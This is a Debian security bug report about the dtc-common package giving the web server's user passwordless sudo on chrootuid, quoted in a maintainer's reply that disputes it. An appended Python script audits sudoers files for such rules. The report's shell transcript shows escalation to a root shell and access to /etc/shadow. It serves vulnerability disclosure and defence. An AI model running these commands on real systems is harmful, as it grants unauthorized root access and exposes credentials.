On 08/13/2011 12:56 PM, Mike O'Connor wrote:
> Package: dtc-common
> Severity: critical
> Tags: security
> Justification: root security hole
> 
> 
> the install script gives sudo access to the dtc user (the user that is running
> apache) unrestricted access to chrootuid, which essentially gives root access
> to the dtc account:
> 
> root@testdtc:/var/lib/dtc/etc# su - dtc
> $ whoami
> dtc
> $ sudo chrootuid / root /bin/bash
> root@testdtc:/# whoami
> root
> root@testdtc:/# wc -l /etc/shadow
> 27 /etc/shadow
> rot@testdtc:/# grep dtc /etc/sudoers
> Defaults:dtc !set_logname
> dtc      ALL= NOPASSWD: /usr/bin/chrootuid *

But users are jailed in a chroot when they run web scripts or shell
access, so I don't see how this can happen. In their chroot they can't
do that.

Thomas
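
Added example, not part of either message and not DTC's code: a small audit that flags sudoers rules of the shape quoted in the report (`NOPASSWD` with a wildcard argument list) so they can be reviewed. The function names are hypothetical, the parser covers only simple one-line rules, and every sample line except the two `dtc` lines is constructed.

```python
import re

# Constructed sample; only the two dtc lines come from the report above.
SAMPLE_SUDOERS = """\
# constructed sample
Defaults:dtc !set_logname
dtc      ALL= NOPASSWD: /usr/bin/chrootuid *
backup   ALL=(root) NOPASSWD: /usr/bin/rsync --server --sender -logDtpr . /srv/data
admin    ALL=(ALL) ALL
www-data ALL= NOPASSWD: /usr/local/bin/reload-vhosts, \\
                        /usr/local/bin/run-helper *
"""

# user, host list, then the command specification list after '='
RULE = re.compile(r"^(?P<who>\S+)\s+(?P<hosts>[^=]+?)\s*=\s*(?P<rest>.+)$")


def join_continuations(text):
    """Merge lines ending in a backslash, as sudoers allows."""
    return re.sub(r"\\\n\s*", " ", text).splitlines()


def audit(text):
    """Return (user, command, args) for passwordless rules with open arguments."""
    findings = []
    for line in join_continuations(text):
        m = RULE.match(line.strip())
        if not m or m.group("who").startswith(("#", "Defaults")):
            continue
        nopasswd = False  # a tag carries over to later commands in the list
        # Simplification: assumes no commas inside a Runas spec or arguments.
        for spec in m.group("rest").split(","):
            spec = re.sub(r"^\s*\([^)]*\)\s*", "", spec.strip())  # drop Runas
            for tag in re.findall(r"\b(NOPASSWD|PASSWD):", spec):
                nopasswd = tag == "NOPASSWD"
            body = re.sub(r"\b[A-Z_]+:\s*", "", spec).strip()  # drop all tags
            cmd, _, args = body.partition(" ")
            # Wildcard arguments (or ALL) leave the caller free to choose them.
            if nopasswd and (cmd == "ALL" or re.search(r"[*?]", args)):
                findings.append((m.group("who"), cmd, args.strip()))
    return findings


if __name__ == "__main__":
    for who, cmd, args in audit(SAMPLE_SUDOERS):
        print(f"review: {who} may run {cmd} {args} without a password")
```
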


